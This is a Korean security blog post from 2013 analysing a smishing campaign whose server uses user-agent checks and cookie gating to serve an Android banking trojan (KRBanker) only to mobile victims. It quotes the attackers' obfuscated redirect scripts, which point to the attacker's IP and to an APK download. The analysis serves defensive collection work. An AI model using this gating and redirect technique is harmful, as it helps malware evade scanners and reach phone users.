본문 바로가기
IT 보안소식

스미싱(Smishing), "쿠키(Cookie)" 이용한 사이트 리다이렉션 및 어플리케이션 다운로드 시작

by 잡다한 처리 2013. 12. 31.
반응형


이전 스미싱 제작자가 자신들의 파일이 모바일 단말기가 아닌 데스크탑 OS에서 다운로드 되는 것을 눈치채어
User Agent를 파악하여 다운로드 시키는 방식을 소개 한 적이 있다.


이전에는 사용자의 User Agent로 를 판단하여 리다이렉션 시켰는데, 이번에는 쿠키를 이용하여 리다이렉션을 시키는 사례가 
발견되어 간단하게 적어본다.

또한 어떻게 사용자를 기만하는지 한번 알아보자.
 
발견 된 스미싱 문자의 URL은 "133.209.91.101" 이다.
(※ 현재는 서버가 종료되었으므로 전체 URL을 공개)
 

 
우선 기본적인 User Agent로 접속을 시도해보았다. 
사용 된 User Agent 는 Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2) Gecko/20010726 Netscape/7.0 이다.

아래의 그림과 같이 지마켓 사이트인 "http://www.gmarket.co.kr" URL로 리다이렉션 되었다.




그럼 다시 모바일 User Agent로 접속을 시도해보았다. 

사용 된 User Agent 는 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebkit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 이다.

그럼 아래와 같이 실제 스미싱 서버로 접속이 가능하다.


실제 접속 된 사이트의 내용은 아래와 같다.

※ 접속 된 서버 내용

<script runat=server>

var key1 = '01031349899';

document.cookie = 'key1=' + key1;

location.href = 'h' + 't' + 'tp://' + '133.209.91.101/' + 'do' + 'wn' + '.' + 'a' + 'sp' // 133.209.91.101/down.asp 로 접속

</script>



그럼 이제 새롭게 나온 "133.209.91.101/down.asp" URL로 접속을 해보자.
물론 User Agent는 모바일용으로 접속했다.

하지만, 처음과 마찬가지로 지마켓 사이트인 "http://www.gmarket.co.kr" URL로 리다이렉션 되었다.




그 이유는 아래의 그림에 존재했다.
바로 쿠키(Cookie)를 지정해주어야 관련 URL로 접속이 가능했던 것이다.

첫번째, 쿠키값은 var key1 = '01031349899' 였다.




그럼 이제 첫번째 쿠키값인 var key1 = '01031349899' 로 "133.209.91.101/down.asp" URL로 접속을 시도해보았다.
다시 실제 서버였던 내용이 보여진다. 



실제 접속 된 사이트의 내용은 아래와 같다.

※ 접속 된 서버 내용

<script runat=server>

var key2 ='01039515445';

document.cookie = 'key2=' + key2;

location.href = 'ht' + 'tp://133.209.91.101/Ap' + 'p' + '.ap' + 'k' // 133.209.91.101/App.apk 로 접속

</script>



마지막으로 133.209.91.101/App.apk 파일을 받기 위해서는 두번째 쿠키값인 var key2 ='01039515445' 을 입력해야만
APK 파일을 다운로드 받을 수 있었다. 




해당 파일은 알약 안드로이드 에서 "Trojan.Android.KRBanker" 로 탐지 된다.



추가적으로 해당 서버는 일본에 존재했던 서버로 확인되었다.


IP Address : 133.209.91.101 

inetnum : 133.0.0.0 - 133.255.255.255  

Country : JAPAN 

Country Code : JP 

CITY : TOKYO 

REGION : TOKYO 

ISP : JAPAN NETWORK INFORMATION CENTER 

DOMAIN : BIGRIVERWIRELESS.NET 

DomainTools :  Verification 
 



이전에도 이야기했지만, 스미싱 배포 환경에 따라 
     보안업체 또는 스미싱 어플리케이션을 수집하는 시스템
            지속적으로 발전해야 스미싱 어플리케이션 파일을 수집할 수 있다.

'IT 보안소식' 카테고리의 다른 글

스미싱(Smishing), 이중 URL로 사용자를 현혹시키는 스미싱 메시지 주의  (3) 2014.01.09
KB국민카드·롯데카드·NH농협카드, 고객정보 1억명 개인정보 유출 사건(2014-01-08)  (2) 2014.01.08
알툴즈(Altools), 알툴즈 사이트 리뉴얼 페이지 공개  (0) 2013.12.21
안드로이드(Android), 비아그라 판매 SMS로 유인하는 스미싱 메시지 주의!!!!  (2) 2013.12.20
한국스탠다드차타드은행(Standard Chartered) + 한국씨티은행(Citi Bank), 고객정보 13만명 개인정보 유출 사건(2013-12-11)  (0) 2013.12.12

관련글

댓글

티스토리툴바